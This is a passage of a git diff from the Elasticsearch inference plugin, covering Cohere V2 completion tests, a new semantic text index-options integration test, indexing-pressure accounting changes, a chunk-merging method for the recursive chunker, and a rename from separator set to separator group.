completionsConfig(getUrl(cohereCompletionsServer)), TaskType.COMPLETION); + + cohereCompletionsServer.enqueue(new MockResponse().setResponseCode(200).setBody(completionsResponse(ApiVersion.V2))); + var inferenceMap = inference(newClusterId, TaskType.COMPLETION, "some text"); + assertThat(inferenceMap.entrySet(), not(empty())); + assertVersionInPath(cohereCompletionsServer.requests().getLast(), "chat", ApiVersion.V2); + } + + { + // new endpoints use the V2 API, which requires the model to be set + final String upgradedClusterNoModel = "upgraded-cluster-missing-model-id"; + var jsonBody = Strings.format(""" + { + "service": "cohere", + "service_settings": { + "url": "%s", + "api_key": "XXXX" + } + } + """, getUrl(cohereEmbeddingsServer)); + + var e = expectThrows(ResponseException.class, () -> put(upgradedClusterNoModel, jsonBody, TaskType.COMPLETION)); + assertThat( + e.getMessage(), + containsString("Validation Failed: 1: The [service_settings.model_id] field is required for the Cohere V2 API.") + ); + } + + delete(oldClusterId); + delete(newClusterId); + } + } + private String embeddingConfigByte(String url) { return embeddingConfigTemplate(url, "byte"); } @@ -451,4 +531,86 @@
private String rerankResponse() { """; } + private String completionsConfig(String url) { + return Strings.format(""" + { + "service": "cohere", + "service_settings": { + "api_key": "XXXX", + "model_id": "command", + "url": "%s" + } + } + """, url); + } + + private String completionsResponse(ApiVersion version) { + return switch (version) { + case V1 -> v1CompletionsResponse(); + case V2 -> v2CompletionsResponse(); + }; + } + + private String v1CompletionsResponse() { + return """ + { + "response_id": "some id", + "text": "result", + "generation_id": "some id", + "chat_history": [ + { + "role": "USER", + "message": "some input" + }, + { + "role": "CHATBOT", + "message": "v1 response from the llm" + } + ], + "finish_reason": "COMPLETE", + "meta": { + "api_version": { + "version": "1" + }, + "billed_units": { + "input_tokens": 4, + "output_tokens": 191 + }, + "tokens": { + "input_tokens": 70, + "output_tokens": 191 + } + } + } + """; + } + + private String v2CompletionsResponse() { + return """ + { + "id": "c14c80c3-18eb-4519-9460-6c92edd8cfb4", + "finish_reason": "COMPLETE", + "message": { + "role": "assistant", + "content": [ + { + "type": "text", + "text": "v2 response from the LLM" + } + ] + }, + "usage": { + "billed_units": { + "input_tokens": 1, + "output_tokens": 2 + }, + "tokens": { + "input_tokens": 3, + "output_tokens": 4 + } + } + } + """; + } + } diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterBasicLicenseIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterBasicLicenseIT.java index e2d00b8c52781..33b9adb431a0a 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterBasicLicenseIT.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterBasicLicenseIT.java @@ -23,6 +23,7 @@ import org.elasticsearch.license.LicenseSettings; import org.elasticsearch.plugins.Plugin; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.xpack.core.XPackField; import org.elasticsearch.xpack.inference.LocalStateInferencePlugin; import org.elasticsearch.xpack.inference.Utils; @@ -42,6 +43,7 @@ import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.instanceOf; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class ShardBulkInferenceActionFilterBasicLicenseIT extends ESIntegTestCase { public static final String INDEX_NAME = "test-index"; diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterIT.java index 8405fba22460f..7ddbf4fc55ffd 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterIT.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilterIT.java @@ -32,6 +32,7 @@ import org.elasticsearch.plugins.Plugin; import org.elasticsearch.search.builder.SearchSourceBuilder; import org.elasticsearch.test.ESIntegTestCase; +import 
org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.InternalTestCluster; import org.elasticsearch.xpack.inference.InferenceIndex; import org.elasticsearch.xpack.inference.LocalStateInferencePlugin; @@ -56,6 +57,7 @@ import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class ShardBulkInferenceActionFilterIT extends ESIntegTestCase { public static final String INDEX_NAME = "test-index"; diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/InferenceRevokeDefaultEndpointsIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/InferenceRevokeDefaultEndpointsIT.java index 4c200c6f20247..14f780b19fa1e 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/InferenceRevokeDefaultEndpointsIT.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/InferenceRevokeDefaultEndpointsIT.java @@ -20,6 +20,7 @@ import org.elasticsearch.plugins.Plugin; import org.elasticsearch.reindex.ReindexPlugin; import org.elasticsearch.test.ESSingleNodeTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.http.MockResponse; import org.elasticsearch.test.http.MockWebServer; import org.elasticsearch.threadpool.ThreadPool; @@ -47,6 +48,7 @@ import static org.hamcrest.Matchers.containsInAnyOrder; import static org.mockito.Mockito.mock; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class InferenceRevokeDefaultEndpointsIT extends ESSingleNodeTestCase { private static final TimeValue TIMEOUT = new TimeValue(30, TimeUnit.SECONDS); @@ -193,7 +195,7 @@ public void testRemoves_DefaultChatCompletion_V1_WhenAuthorizationDoesNotReturnA { "models": [ { - "model_name": "elser-v2", + "model_name": "elser_model_2", "task_types": ["embed/text/sparse"] }, { @@ -222,7 +224,7 @@ public void testRemoves_DefaultChatCompletion_V1_WhenAuthorizationDoesNotReturnA service.defaultConfigIds(), containsInAnyOrder( new InferenceService.DefaultConfigId( - ".elser-v2-elastic", + ".elser-2-elastic", MinimalServiceSettings.sparseEmbedding(ElasticInferenceService.NAME), service ), @@ -255,7 +257,7 @@ public void testRemoves_DefaultChatCompletion_V1_WhenAuthorizationDoesNotReturnA PlainActionFuture> listener = new PlainActionFuture<>(); service.defaultConfigs(listener); - assertThat(listener.actionGet(TIMEOUT).get(0).getConfigurations().getInferenceEntityId(), is(".elser-v2-elastic")); + assertThat(listener.actionGet(TIMEOUT).get(0).getConfigurations().getInferenceEntityId(), is(".elser-2-elastic")); assertThat( listener.actionGet(TIMEOUT).get(1).getConfigurations().getInferenceEntityId(), is(".multilingual-embed-v1-elastic") @@ -277,7 +279,7 @@ public void testRemoves_DefaultChatCompletion_V1_WhenAuthorizationDoesNotReturnA { "models": [ { - "model_name": "elser-v2", + "model_name": "elser_model_2", "task_types": ["embed/text/sparse"] }, { @@ -302,7 +304,7 @@ public void testRemoves_DefaultChatCompletion_V1_WhenAuthorizationDoesNotReturnA service.defaultConfigIds(), containsInAnyOrder( new InferenceService.DefaultConfigId( - ".elser-v2-elastic", + ".elser-2-elastic", MinimalServiceSettings.sparseEmbedding(ElasticInferenceService.NAME), service ), diff --git 
a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/ModelRegistryIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/ModelRegistryIT.java index e56782bd00ef5..3c09e73c55411 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/ModelRegistryIT.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/ModelRegistryIT.java @@ -34,6 +34,7 @@ import org.elasticsearch.plugins.Plugin; import org.elasticsearch.reindex.ReindexPlugin; import org.elasticsearch.test.ESSingleNodeTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.xcontent.ToXContentObject; import org.elasticsearch.xcontent.XContentBuilder; @@ -74,6 +75,7 @@ import static org.mockito.Mockito.doAnswer; import static org.mockito.Mockito.mock; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class ModelRegistryIT extends ESSingleNodeTestCase { private static final TimeValue TIMEOUT = new TimeValue(30, TimeUnit.SECONDS); diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexOptionsIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexOptionsIT.java new file mode 100644 index 0000000000000..7ee1db0a8eb80 --- /dev/null +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexOptionsIT.java @@ -0,0 +1,279 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. 
+ */ + +package org.elasticsearch.xpack.inference.integration; + +import org.elasticsearch.action.admin.indices.mapping.get.GetFieldMappingsAction; +import org.elasticsearch.action.admin.indices.mapping.get.GetFieldMappingsRequest; +import org.elasticsearch.action.support.IndicesOptions; +import org.elasticsearch.common.bytes.BytesReference; +import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.xcontent.XContentHelper; +import org.elasticsearch.core.Nullable; +import org.elasticsearch.core.TimeValue; +import org.elasticsearch.index.mapper.vectors.DenseVectorFieldMapper; +import org.elasticsearch.index.mapper.vectors.IndexOptions; +import org.elasticsearch.inference.TaskType; +import org.elasticsearch.license.GetLicenseAction; +import org.elasticsearch.license.License; +import org.elasticsearch.license.LicenseSettings; +import org.elasticsearch.license.PostStartBasicAction; +import org.elasticsearch.license.PostStartBasicRequest; +import org.elasticsearch.license.PutLicenseAction; +import org.elasticsearch.license.PutLicenseRequest; +import org.elasticsearch.license.TestUtils; +import org.elasticsearch.plugins.Plugin; +import org.elasticsearch.protocol.xpack.license.GetLicenseRequest; +import org.elasticsearch.reindex.ReindexPlugin; +import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.InternalTestCluster; +import org.elasticsearch.xcontent.ToXContent; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.XContentFactory; +import org.elasticsearch.xcontent.XContentType; +import org.elasticsearch.xpack.core.inference.action.DeleteInferenceEndpointAction; +import org.elasticsearch.xpack.core.inference.action.PutInferenceModelAction; +import org.elasticsearch.xpack.inference.InferenceIndex; +import org.elasticsearch.xpack.inference.LocalStateInferencePlugin; +import org.elasticsearch.xpack.inference.mapper.SemanticTextFieldMapper; +import org.elasticsearch.xpack.inference.mock.TestDenseInferenceServiceExtension; +import org.elasticsearch.xpack.inference.mock.TestInferenceServicePlugin; +import org.elasticsearch.xpack.inference.mock.TestSparseInferenceServiceExtension; +import org.junit.After; +import org.junit.Before; + +import java.io.IOException; +import java.util.Collection; +import java.util.HashMap; +import java.util.List; +import java.util.Map; + +import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; +import static org.hamcrest.CoreMatchers.equalTo; + +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 +public class SemanticTextIndexOptionsIT extends ESIntegTestCase { + private static final String INDEX_NAME = "test-index"; + private static final Map BBQ_COMPATIBLE_SERVICE_SETTINGS = Map.of( + "model", + "my_model", + "dimensions", + 256, + "similarity", + "cosine", + "api_key", + "my_api_key" + ); + + private final Map inferenceIds = new HashMap<>(); + + @Override + protected Settings nodeSettings(int nodeOrdinal, Settings otherSettings) { + return Settings.builder().put(LicenseSettings.SELF_GENERATED_LICENSE_TYPE.getKey(), "trial").build(); + } + + @Override + protected Collection> nodePlugins() { + return List.of(LocalStateInferencePlugin.class, TestInferenceServicePlugin.class, ReindexPlugin.class); + } + + @Before + public void resetLicense() throws Exception { + setLicense(License.LicenseType.TRIAL); + } + + @After + public void cleanUp() { + assertAcked( + safeGet( + client().admin() + .indices() + 
.prepareDelete(INDEX_NAME) + .setIndicesOptions( + IndicesOptions.builder().concreteTargetOptions(new IndicesOptions.ConcreteTargetOptions(true)).build() + ) + .execute() + ) + ); + + for (var entry : inferenceIds.entrySet()) { + assertAcked( + safeGet( + client().execute( + DeleteInferenceEndpointAction.INSTANCE, + new DeleteInferenceEndpointAction.Request(entry.getKey(), entry.getValue(), true, false) + ) + ) + ); + } + } + + public void testValidateIndexOptionsWithBasicLicense() throws Exception { + final String inferenceId = "test-inference-id-1"; + final String inferenceFieldName = "inference_field"; + createInferenceEndpoint(TaskType.TEXT_EMBEDDING, inferenceId, BBQ_COMPATIBLE_SERVICE_SETTINGS); + downgradeLicenseAndRestartCluster(); + + IndexOptions indexOptions = new DenseVectorFieldMapper.Int8HnswIndexOptions( + randomIntBetween(1, 100), + randomIntBetween(1, 10_000), + null, + null + ); + assertAcked( + safeGet(prepareCreate(INDEX_NAME).setMapping(generateMapping(inferenceFieldName, inferenceId, indexOptions)).execute()) + ); + + final Map expectedFieldMapping = generateExpectedFieldMapping(inferenceFieldName, inferenceId, indexOptions); + assertThat(getFieldMappings(inferenceFieldName, false), equalTo(expectedFieldMapping)); + } + + private void createInferenceEndpoint(TaskType taskType, String inferenceId, Map serviceSettings) throws IOException { + final String service = switch (taskType) { + case TEXT_EMBEDDING -> TestDenseInferenceServiceExtension.TestInferenceService.NAME; + case SPARSE_EMBEDDING -> TestSparseInferenceServiceExtension.TestInferenceService.NAME; + default -> throw new IllegalArgumentException("Unhandled task type [" + taskType + "]"); + }; + + final BytesReference content; + try (XContentBuilder builder = XContentFactory.jsonBuilder()) { + builder.startObject(); + builder.field("service", service); + builder.field("service_settings", serviceSettings); + builder.endObject(); + + content = BytesReference.bytes(builder); + } + + PutInferenceModelAction.Request request = new PutInferenceModelAction.Request( + taskType, + inferenceId, + content, + XContentType.JSON, + TEST_REQUEST_TIMEOUT + ); + var responseFuture = client().execute(PutInferenceModelAction.INSTANCE, request); + assertThat(responseFuture.actionGet(TEST_REQUEST_TIMEOUT).getModel().getInferenceEntityId(), equalTo(inferenceId)); + + inferenceIds.put(inferenceId, taskType); + } + + private static XContentBuilder generateMapping(String inferenceFieldName, String inferenceId, @Nullable IndexOptions indexOptions) + throws IOException { + XContentBuilder mapping = XContentFactory.jsonBuilder(); + mapping.startObject(); + mapping.field("properties"); + generateFieldMapping(mapping, inferenceFieldName, inferenceId, indexOptions); + mapping.endObject(); + + return mapping; + } + + private static void generateFieldMapping( + XContentBuilder builder, + String inferenceFieldName, + String inferenceId, + @Nullable IndexOptions indexOptions + ) throws IOException { + builder.startObject(); + builder.startObject(inferenceFieldName); + builder.field("type", SemanticTextFieldMapper.CONTENT_TYPE); + builder.field("inference_id", inferenceId); + if (indexOptions != null) { + builder.startObject("index_options"); + if (indexOptions instanceof DenseVectorFieldMapper.DenseVectorIndexOptions) { + builder.field("dense_vector"); + indexOptions.toXContent(builder, ToXContent.EMPTY_PARAMS); + } + builder.endObject(); + } + builder.endObject(); + builder.endObject(); + } + + private static Map generateExpectedFieldMapping( + 
String inferenceFieldName, + String inferenceId, + @Nullable IndexOptions indexOptions + ) throws IOException { + Map expectedFieldMapping; + try (XContentBuilder builder = XContentFactory.jsonBuilder()) { + generateFieldMapping(builder, inferenceFieldName, inferenceId, indexOptions); + expectedFieldMapping = XContentHelper.convertToMap(BytesReference.bytes(builder), false, XContentType.JSON).v2(); + } + + return expectedFieldMapping; + } + + @SuppressWarnings("unchecked") + private static Map filterNullOrEmptyValues(Map map) { + Map filteredMap = new HashMap<>(); + for (var entry : map.entrySet()) { + Object value = entry.getValue(); + if (entry.getValue() instanceof Map mapValue) { + if (mapValue.isEmpty()) { + continue; + } + + value = filterNullOrEmptyValues((Map) mapValue); + } + + if (value != null) { + filteredMap.put(entry.getKey(), value); + } + } + + return filteredMap; + } + + private static Map getFieldMappings(String fieldName, boolean includeDefaults) { + var request = new GetFieldMappingsRequest().indices(INDEX_NAME).fields(fieldName).includeDefaults(includeDefaults); + return safeGet(client().execute(GetFieldMappingsAction.INSTANCE, request)).fieldMappings(INDEX_NAME, fieldName).sourceAsMap(); + } + + private static void setLicense(License.LicenseType type) throws Exception { + if (type == License.LicenseType.BASIC) { + assertAcked( + safeGet( + client().execute( + PostStartBasicAction.INSTANCE, + new PostStartBasicRequest(TEST_REQUEST_TIMEOUT, TEST_REQUEST_TIMEOUT).acknowledge(true) + ) + ) + ); + } else { + License license = TestUtils.generateSignedLicense( + type.getTypeName(), + License.VERSION_CURRENT, + -1, + TimeValue.timeValueHours(24) + ); + assertAcked( + safeGet( + client().execute( + PutLicenseAction.INSTANCE, + new PutLicenseRequest(TEST_REQUEST_TIMEOUT, TEST_REQUEST_TIMEOUT).license(license) + ) + ) + ); + } + } + + private static void assertLicense(License.LicenseType type) { + var getLicenseResponse = safeGet(client().execute(GetLicenseAction.INSTANCE, new GetLicenseRequest(TEST_REQUEST_TIMEOUT))); + assertThat(getLicenseResponse.license().type(), equalTo(type.getTypeName())); + } + + private void downgradeLicenseAndRestartCluster() throws Exception { + // Downgrade the license and restart the cluster to force the model registry to rebuild + setLicense(License.LicenseType.BASIC); + internalCluster().fullRestart(new InternalTestCluster.RestartCallback()); + ensureGreen(InferenceIndex.INDEX_NAME); + assertLicense(License.LicenseType.BASIC); + } +} diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexVersionIT.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexVersionIT.java index 6f8992b5bd200..8986b0a158e9f 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexVersionIT.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/integration/SemanticTextIndexVersionIT.java @@ -24,6 +24,7 @@ import org.elasticsearch.search.builder.SearchSourceBuilder; import org.elasticsearch.search.fetch.subphase.highlight.HighlightBuilder; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.index.IndexVersionUtils; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xcontent.XContentFactory; @@ -50,6 +51,7 @@ import static 
org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertResponse; import static org.hamcrest.Matchers.equalTo; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class SemanticTextIndexVersionIT extends ESIntegTestCase { private static final int MAXIMUM_NUMBER_OF_VERSIONS_TO_TEST = 25; private static final String SPARSE_SEMANTIC_FIELD = "sparse_field"; diff --git a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/rest/ServerSentEventsRestActionListenerTests.java b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/rest/ServerSentEventsRestActionListenerTests.java index 87e14e4e89d88..3287995588d86 100644 --- a/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/rest/ServerSentEventsRestActionListenerTests.java +++ b/x-pack/plugin/inference/src/internalClusterTest/java/org/elasticsearch/xpack/inference/rest/ServerSentEventsRestActionListenerTests.java @@ -45,6 +45,7 @@ import org.elasticsearch.rest.RestRequest; import org.elasticsearch.rest.RestStatus; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.xcontent.ToXContent; import org.elasticsearch.xpack.core.inference.action.InferenceAction; @@ -75,6 +76,7 @@ import static org.hamcrest.Matchers.nullValue; @ESIntegTestCase.ClusterScope(numDataNodes = 1) +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class ServerSentEventsRestActionListenerTests extends ESIntegTestCase { private static final String INFERENCE_ROUTE = "/_inference"; private static final String REQUEST_COUNT = "request_count"; diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/InferenceFeatures.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/InferenceFeatures.java index 2bc481cc484d6..8d91d3e14d181 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/InferenceFeatures.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/InferenceFeatures.java @@ -36,8 +36,12 @@ public class InferenceFeatures implements FeatureSpecification { private static final NodeFeature TEST_RULE_RETRIEVER_WITH_INDICES_THAT_DONT_RETURN_RANK_DOCS = new NodeFeature( "test_rule_retriever.with_indices_that_dont_return_rank_docs" ); + private static final NodeFeature SEMANTIC_QUERY_REWRITE_INTERCEPTORS_PROPAGATE_BOOST_AND_QUERY_NAME_FIX = new NodeFeature( + "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + ); private static final NodeFeature SEMANTIC_TEXT_MATCH_ALL_HIGHLIGHTER = new NodeFeature("semantic_text.match_all_highlighter"); private static final NodeFeature COHERE_V2_API = new NodeFeature("inference.cohere.v2"); + public static final NodeFeature SEMANTIC_TEXT_HIGHLIGHTING_FLAT = new NodeFeature("semantic_text.highlighter.flat_index_options"); @Override public Set getTestFeatures() { @@ -66,7 +70,9 @@ public Set getTestFeatures() { SEMANTIC_TEXT_MATCH_ALL_HIGHLIGHTER, SEMANTIC_TEXT_EXCLUDE_SUB_FIELDS_FROM_FIELD_CAPS, SEMANTIC_TEXT_INDEX_OPTIONS, - COHERE_V2_API + COHERE_V2_API, + SEMANTIC_QUERY_REWRITE_INTERCEPTORS_PROPAGATE_BOOST_AND_QUERY_NAME_FIX, + SEMANTIC_TEXT_HIGHLIGHTING_FLAT ); } } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilter.java 
b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilter.java index 082ece347208a..3127361de6d11 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilter.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/filter/ShardBulkInferenceActionFilter.java @@ -631,7 +631,7 @@ private boolean incrementIndexingPressure(IndexRequestWithIndexingPressure index if (indexRequest.isIndexingPressureIncremented() == false) { try { // Track operation count as one operation per document source update - coordinatingIndexingPressure.increment(1, indexRequest.getIndexRequest().source().ramBytesUsed()); + coordinatingIndexingPressure.increment(1, indexRequest.getIndexRequest().source().length()); indexRequest.setIndexingPressureIncremented(); } catch (EsRejectedExecutionException e) { addInferenceResponseFailure( @@ -737,13 +737,13 @@ private void applyInferenceResponses(BulkItemRequest item, FieldInferenceRespons indexRequest.source(builder); } } - long modifiedSourceSize = indexRequest.source().ramBytesUsed(); + long modifiedSourceSize = indexRequest.source().length(); // Add the indexing pressure from the source modifications. // Don't increment operation count because we count one source update as one operation, and we already accounted for those // in addFieldInferenceRequests. try { - coordinatingIndexingPressure.increment(0, modifiedSourceSize - originalSource.ramBytesUsed()); + coordinatingIndexingPressure.increment(0, modifiedSourceSize - originalSource.length()); } catch (EsRejectedExecutionException e) { indexRequest.source(originalSource, indexRequest.getContentType()); item.abort( diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManager.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManager.java index 8aa437c773608..3ddb9883ba007 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManager.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/action/task/StreamingTaskManager.java @@ -105,7 +105,7 @@ public Task createTask(long id, String type, String action, TaskId parentTaskId, flowTask.addListener(TaskBackedProcessor.this::cancelTask); return flowTask; } - }); + }, false); } } } diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/ChunkingSettingsOptions.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/ChunkingSettingsOptions.java index 5d04df5d2e1d5..c5e4abd3648c5 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/ChunkingSettingsOptions.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/ChunkingSettingsOptions.java @@ -12,7 +12,7 @@ public enum ChunkingSettingsOptions { MAX_CHUNK_SIZE("max_chunk_size"), OVERLAP("overlap"), SENTENCE_OVERLAP("sentence_overlap"), - SEPARATOR_SET("separator_set"), + SEPARATOR_GROUP("separator_group"), SEPARATORS("separators"); private final String chunkingSettingsOption; diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunker.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunker.java index 690a3d8ff0efe..c68dc3b216744 100644 --- 
a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunker.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunker.java @@ -60,7 +60,10 @@ private List chunk(String input, ChunkOffset offset, List s return chunkWithBackupChunker(input, offset, maxChunkSize); } - var potentialChunks = splitTextBySeparatorRegex(input, offset, separators.get(separatorIndex)); + var potentialChunks = mergeChunkOffsetsUpToMaxChunkSize( + splitTextBySeparatorRegex(input, offset, separators.get(separatorIndex)), + maxChunkSize + ); var actualChunks = new ArrayList(); for (var potentialChunk : potentialChunks) { if (isChunkWithinMaxSize(potentialChunk, maxChunkSize)) { @@ -104,6 +107,33 @@ private List splitTextBySeparatorRegex(String input, ChunkO return chunkOffsets; } + private List<ChunkOffsetAndCount> mergeChunkOffsetsUpToMaxChunkSize(List<ChunkOffsetAndCount> chunkOffsets, int maxChunkSize) { + if (chunkOffsets.size() < 2) { + return chunkOffsets; + } + + List<ChunkOffsetAndCount> mergedOffsetsAndCounts = new ArrayList<>(); + var mergedChunk = chunkOffsets.getFirst(); + for (int i = 1; i < chunkOffsets.size(); i++) { + var chunkOffsetAndCountToMerge = chunkOffsets.get(i); + var potentialMergedChunk = new ChunkOffsetAndCount( + new ChunkOffset(mergedChunk.chunkOffset.start(), chunkOffsetAndCountToMerge.chunkOffset.end()), + mergedChunk.wordCount + chunkOffsetAndCountToMerge.wordCount + ); + if (isChunkWithinMaxSize(potentialMergedChunk, maxChunkSize)) { + mergedChunk = potentialMergedChunk; + } else { + mergedOffsetsAndCounts.add(mergedChunk); + mergedChunk = chunkOffsets.get(i); + } + + if (i == chunkOffsets.size() - 1) { + mergedOffsetsAndCounts.add(mergedChunk); + } + } + return mergedOffsetsAndCounts; + } + private List chunkWithBackupChunker(String input, ChunkOffset offset, int maxChunkSize) { var chunks = new SentenceBoundaryChunker().chunk( input.substring(offset.start(), offset.end()), diff --git a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettings.java b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettings.java index c368e1bb0c255..611736ceb4213 100644 --- a/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettings.java +++ b/x-pack/plugin/inference/src/main/java/org/elasticsearch/xpack/inference/chunking/RecursiveChunkingSettings.java @@ -36,7 +36,7 @@ public class RecursiveChunkingSettings implements ChunkingSettings { private static final Set<String> VALID_KEYS = Set.of( ChunkingSettingsOptions.STRATEGY.toString(), ChunkingSettingsOptions.MAX_CHUNK_SIZE.toString(), - ChunkingSettingsOptions.SEPARATOR_SET.toString(), + ChunkingSettingsOptions.SEPARATOR_GROUP.toString(), ChunkingSettingsOptions.SEPARATORS.toString() ); @@ -45,7 +45,7 @@ public class RecursiveChunkingSettings implements ChunkingSettings { public RecursiveChunkingSettings(int maxChunkSize, List<String> separators) { this.maxChunkSize = maxChunkSize; - this.separators = separators == null ? SeparatorSet.PLAINTEXT.getSeparators() : separators; + this.separators = separators == null ?
SeparatorGroup.PLAINTEXT.getSeparators() : separators; } public RecursiveChunkingSettings(StreamInput in) throws IOException { @@ -72,12 +72,12 @@ public static RecursiveChunkingSettings fromMap(Map<String, Object> map) { validationException ); - SeparatorSet separatorSet = ServiceUtils.extractOptionalEnum( + SeparatorGroup separatorGroup = ServiceUtils.extractOptionalEnum( map, - ChunkingSettingsOptions.SEPARATOR_SET.toString(), + ChunkingSettingsOptions.SEPARATOR_GROUP.toString(), ModelConfigurations.CHUNKING_SETTINGS, - SeparatorSet::fromString, - EnumSet.allOf(SeparatorSet.class), + SeparatorGroup::fromString, + EnumSet.allOf(SeparatorGroup.class), validationException ); @@ -88,12 +88,12 @@ public static RecursiveChunkingSettings fromMap(Map<String, Object> map) { validationException ); - if (separators != null && separatorSet != null) { + if (separators != null && separatorGroup != null) { - validationException.addValidationError("Recursive chunking settings can not have both separators and separator_set"); + validationException.addValidationError("Recursive chunking settings can not have both separators and separator_group"); } - if (separatorSet != null) { - separators = separatorSet.getSeparators(); + if (separatorGroup != null) { + separators = separatorGroup.getSeparators(); } else if (separators != null && separators.isEmpty()) { validationException.addValidationError("Recursive chunking settings can not have an empty list of separators"); } diff --git 